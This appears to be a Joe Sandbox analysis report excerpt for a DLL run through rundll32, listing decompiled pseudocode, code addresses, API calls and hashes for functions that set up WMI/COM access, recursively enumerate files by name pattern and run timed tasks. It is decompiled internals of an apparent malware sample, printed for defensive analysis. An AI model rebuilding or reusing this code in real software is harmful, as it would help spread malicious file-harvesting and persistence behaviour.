                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                					_t23 = _v8;
                                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                                						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t24 = _v12;
                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t16 = 0;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					__imp__#2(__ecx);
                                                                                                                                                                                                                					_t25 = _v12;
                                                                                                                                                                                                                					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                                                					if(_t21 < 0) {
                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                                                						if(_t21 < 0) {
                                                                                                                                                                                                                							goto L5;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							_t16 = E10009525(8);
                                                                                                                                                                                                                							if(_t16 == 0) {
                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                                                								 *_t16 = _v8;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t16;
                                                                                                                                                                                                                			}













                                                                                                                                                                                                                0x1000d97f
                                                                                                                                                                                                                0x1000d982
                                                                                                                                                                                                                0x1000d985
                                                                                                                                                                                                                0x1000d996
                                                                                                                                                                                                                0x1000d99c
                                                                                                                                                                                                                0x1000d9ad
                                                                                                                                                                                                                0x1000d9b5
                                                                                                                                                                                                                0x1000da06
                                                                                                                                                                                                                0x1000da06
                                                                                                                                                                                                                0x1000da0b
                                                                                                                                                                                                                0x1000da10
                                                                                                                                                                                                                0x1000da10
                                                                                                                                                                                                                0x1000da13
                                                                                                                                                                                                                0x1000da18
                                                                                                                                                                                                                0x1000da1d
                                                                                                                                                                                                                0x1000da1d
                                                                                                                                                                                                                0x1000da20
                                                                                                                                                                                                                0x1000d9b7
                                                                                                                                                                                                                0x1000d9b8
                                                                                                                                                                                                                0x1000d9be
                                                                                                                                                                                                                0x1000d9cf
                                                                                                                                                                                                                0x1000d9d4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000d9d6
                                                                                                                                                                                                                0x1000d9e3
                                                                                                                                                                                                                0x1000d9eb
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000d9ed
                                                                                                                                                                                                                0x1000d9ef
                                                                                                                                                                                                                0x1000d9f7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000d9f9
                                                                                                                                                                                                                0x1000d9fc
                                                                                                                                                                                                                0x1000da02
                                                                                                                                                                                                                0x1000da02
                                                                                                                                                                                                                0x1000d9f7
                                                                                                                                                                                                                0x1000d9eb
                                                                                                                                                                                                                0x1000d9d4
                                                                                                                                                                                                                0x1000da25

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
                                                                                                                                                                                                                • CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3
                                                                                                                                                                                                                  • Part of subcall function 10009525: RtlAllocateHeap.NTDLL(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1610782348-0
                                                                                                                                                                                                                • Opcode ID: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
                                                                                                                                                                                                                • Instruction ID: d4f531dc68e55bc41b3b40657ad9fbb231386c8691297bdc3f0db5db7518656b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5212530604255BBEB249B66CC48E6FBFBCEFC7B95F00415EB501AA2A0D671DA40CA31
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 69372069
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 6937207A
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69372082
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6937208A
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 69372099
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                • Opcode ID: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
                                                                                                                                                                                                                • Instruction ID: 8b3cb01ddfc5a9076dee4c8247cd5aedbcba059eea28e38c671a831fda68af8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F1173B55053418FCB10EF79EA8955BBBE8FB89364F010839E865CB300EA35D449CB92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 6937213F
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 69372148
                                                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 69372159
                                                                                                                                                                                                                • abort.MSVCRT ref: 69372162
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 520269711-0
                                                                                                                                                                                                                • Opcode ID: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
                                                                                                                                                                                                                • Instruction ID: 0a5301f01946ca17772e9514783ebaa5283c7045d7d6f0960cb8cc4bc0236249
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D91113B5804381CFDB00EF69C64561ABBF4FB4A304F008A29E9A89B300E77899458F52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 6937213F
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 69372148
                                                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 69372159
                                                                                                                                                                                                                • abort.MSVCRT ref: 69372162
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 520269711-0
                                                                                                                                                                                                                • Opcode ID: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
                                                                                                                                                                                                                • Instruction ID: d718274709b9049c1d57c63cc6beaa3bc162dd1cc57d898e45b9b0af26a2eaad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F411D7B6800385CFDF00EFA9D7496597BF8FB07304F008629E9A59B301E77899458F56
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                			E1000C547(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                                                				WCHAR* _t24;
                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                				char _t60;
                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t75 = __fp0;
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_t48 = __ecx;
                                                                                                                                                                                                                				_push(L"\\*");
                                                                                                                                                                                                                				_t24 = E10009DC8(__ecx);
                                                                                                                                                                                                                				_t63 = _t62 + 0xc;
                                                                                                                                                                                                                				_v16 = _t24;
                                                                                                                                                                                                                				if(_t24 == 0) {
                                                                                                                                                                                                                					return _t24;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                                                                                                                                				if(_t59 == 0xffffffff) {
                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                					return E1000953B( &_v16, 0xfffffffe);
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                					if(E1000C51F( &(_v608.cFileName)) != 0) {
                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                						_push( &(_v608.cFileName));
                                                                                                                                                                                                                						_push("\\");
                                                                                                                                                                                                                						_t60 = E10009DC8(_t48);
                                                                                                                                                                                                                						_t63 = _t63 + 0x10;
                                                                                                                                                                                                                						_v12 = _t60;
                                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                                							_t54 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                							 *((intOrPtr*)(_t54 + 0xc4))(1);
                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                							E1000C547(_t60, _t75, 1, 5, E10011316, _a16);
                                                                                                                                                                                                                							_t63 = _t63 + 0x1c;
                                                                                                                                                                                                                							E1000953B( &_v12, 0xfffffffe);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t61 = 0;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_t7 = _t61 + 0x10020e8c; // 0x0
                                                                                                                                                                                                                						_push( *_t7);
                                                                                                                                                                                                                						_push( &(_v608.cFileName));
                                                                                                                                                                                                                						_t41 =  *0x10020d90; // 0x474fc28
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t45 = E10011316(_t75, _t48,  &_v608, _a16);
                                                                                                                                                                                                                						_t63 = _t63 + 0xc;
                                                                                                                                                                                                                						if(_t45 == 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t46 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t46 + 0xc4))(1);
                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                						_t61 = _t61 + 4;
                                                                                                                                                                                                                					} while (_t61 < 4);
                                                                                                                                                                                                                					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                                                                                                                                				_t31 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                				 *((intOrPtr*)(_t31 + 0x84))(_t59);
                                                                                                                                                                                                                				goto L14;
                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                0x1000c547
                                                                                                                                                                                                                0x1000c553
                                                                                                                                                                                                                0x1000c555
                                                                                                                                                                                                                0x1000c557
                                                                                                                                                                                                                0x1000c55d
                                                                                                                                                                                                                0x1000c562
                                                                                                                                                                                                                0x1000c565
                                                                                                                                                                                                                0x1000c56a
                                                                                                                                                                                                                0x1000c686
                                                                                                                                                                                                                0x1000c686
                                                                                                                                                                                                                0x1000c57e
                                                                                                                                                                                                                0x1000c583
                                                                                                                                                                                                                0x1000c675
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c589
                                                                                                                                                                                                                0x1000c589
                                                                                                                                                                                                                0x1000c596
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c5a4
                                                                                                                                                                                                                0x1000c5f7
                                                                                                                                                                                                                0x1000c5f7
                                                                                                                                                                                                                0x1000c5ff
                                                                                                                                                                                                                0x1000c600
                                                                                                                                                                                                                0x1000c60b
                                                                                                                                                                                                                0x1000c60d
                                                                                                                                                                                                                0x1000c610
                                                                                                                                                                                                                0x1000c615
                                                                                                                                                                                                                0x1000c617
                                                                                                                                                                                                                0x1000c61f
                                                                                                                                                                                                                0x1000c625
                                                                                                                                                                                                                0x1000c627
                                                                                                                                                                                                                0x1000c629
                                                                                                                                                                                                                0x1000c63e
                                                                                                                                                                                                                0x1000c643
                                                                                                                                                                                                                0x1000c64c
                                                                                                                                                                                                                0x1000c652
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c615
                                                                                                                                                                                                                0x1000c5a6
                                                                                                                                                                                                                0x1000c5a8
                                                                                                                                                                                                                0x1000c5a8
                                                                                                                                                                                                                0x1000c5a8
                                                                                                                                                                                                                0x1000c5b4
                                                                                                                                                                                                                0x1000c5b5
                                                                                                                                                                                                                0x1000c5bf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c5cc
                                                                                                                                                                                                                0x1000c5d1
                                                                                                                                                                                                                0x1000c5d6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c5d8
                                                                                                                                                                                                                0x1000c5df
                                                                                                                                                                                                                0x1000c5e5
                                                                                                                                                                                                                0x1000c5e5
                                                                                                                                                                                                                0x1000c5e8
                                                                                                                                                                                                                0x1000c5f5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000c653
                                                                                                                                                                                                                0x1000c661
                                                                                                                                                                                                                0x1000c669
                                                                                                                                                                                                                0x1000c66f
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 1000C578
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 1000C65B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                                                • Opcode ID: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
                                                                                                                                                                                                                • Instruction ID: 7b2f7127e2c913cda9fb88d985b2f6b10647df60f7fc8f8a01ff42f64e48081d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31C371A013196FFB10DBA4DC89FDA37A8EB406D1F1001A5F905A61D5EB71EA818B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                			E1000338F() {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                				signed int _t31;
                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                				int _t55;
                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                				_t45 =  *0x10020e00; // 0x0
                                                                                                                                                                                                                				_t31 =  *0x10020e04; // 0x0
                                                                                                                                                                                                                				_t46 = _t45 + 0x3c;
                                                                                                                                                                                                                				_t51 =  *0x10020dec; // 0x0
                                                                                                                                                                                                                				_t44 =  *0x10020de8; // 0x0
                                                                                                                                                                                                                				asm("adc eax, 0x0");
                                                                                                                                                                                                                				_v12 = _t51;
                                                                                                                                                                                                                				_t60 = _t51 - _t31;
                                                                                                                                                                                                                				if(_t60 < 0 || _t60 <= 0 && _t44 <= _t46) {
                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                					return _t31;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t55 = 0;
                                                                                                                                                                                                                					 *0x10020e00 = _t44;
                                                                                                                                                                                                                					 *0x10020e04 = _t51;
                                                                                                                                                                                                                					_t62 =  *0x10020dfc - _t55; // 0x0
                                                                                                                                                                                                                					if(_t62 <= 0) {
                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t58 = 0;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_t32 =  *0x10020e08; // 0x0
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t58 + _t32)) == 0) {
                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                							_t31 = _v8;
                                                                                                                                                                                                                							goto L19;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t52 =  *((intOrPtr*)(_t58 + _t32 + 0x18));
                                                                                                                                                                                                                						if(_t52 == 0 || E1000C2CB(_t52) == 0) {
                                                                                                                                                                                                                							_t47 =  *0x10020e08; // 0x0
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t58 + _t47 + 4)) == 0 ||  *((intOrPtr*)(_t58 + _t47 + 0x1c)) != 0) {
                                                                                                                                                                                                                								_t33 =  *(_t58 + _t47);
                                                                                                                                                                                                                								if(_t33 <= 0) {
                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								asm("cdq");
                                                                                                                                                                                                                								_t35 = _t33 * 0x3c +  *((intOrPtr*)(_t58 + _t47 + 0x10));
                                                                                                                                                                                                                								asm("adc edx, [esi+ecx+0x14]");
                                                                                                                                                                                                                								_t70 = _t52 - _v12;
                                                                                                                                                                                                                								if(_t70 > 0 || _t70 >= 0 && _t35 > _t44) {
                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                								if( *((intOrPtr*)(_t58 + _t47 + 0xc)) == 0) {
                                                                                                                                                                                                                									E100060E9( *((intOrPtr*)(_t58 + _t47 + 8)), 0, 0, 0);
                                                                                                                                                                                                                									_t59 = _t59 + 0x10;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									GetLocaleInfoA(_t55, 0x5a,  &_v24, 4);
                                                                                                                                                                                                                									_t41 =  *0x10020e08; // 0x0
                                                                                                                                                                                                                									 *((intOrPtr*)(_t58 + _t41 + 0xc))();
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t37 =  *0x10020e08; // 0x0
                                                                                                                                                                                                                								 *((intOrPtr*)(_t58 + _t37 + 0x10)) = _t44;
                                                                                                                                                                                                                								 *((intOrPtr*)(_t58 + _t37 + 0x14)) = _v12;
                                                                                                                                                                                                                								_t38 =  *0x10020e08; // 0x0
                                                                                                                                                                                                                								 *((intOrPtr*)(_t58 + _t38 + 0x1c)) = 1;
                                                                                                                                                                                                                								_t31 = 1;
                                                                                                                                                                                                                								_v8 = 1;
                                                                                                                                                                                                                								goto L19;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						L19:
                                                                                                                                                                                                                						_t55 = _t55 + 1;
                                                                                                                                                                                                                						_t58 = _t58 + 0x20;
                                                                                                                                                                                                                						_t73 = _t55 -  *0x10020dfc; // 0x0
                                                                                                                                                                                                                					} while (_t73 < 0);
                                                                                                                                                                                                                					if(_t31 != 0) {
                                                                                                                                                                                                                						_t31 = E100036A4();
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}


























                                                                                                                                                                                                                0x10003395
                                                                                                                                                                                                                0x10003399
                                                                                                                                                                                                                0x1000339f
                                                                                                                                                                                                                0x100033a4
                                                                                                                                                                                                                0x100033a7
                                                                                                                                                                                                                0x100033ae
                                                                                                                                                                                                                0x100033b4
                                                                                                                                                                                                                0x100033b7
                                                                                                                                                                                                                0x100033bc
                                                                                                                                                                                                                0x100033be
                                                                                                                                                                                                                0x100034b2
                                                                                                                                                                                                                0x100034b6
                                                                                                                                                                                                                0x100033ce
                                                                                                                                                                                                                0x100033ce
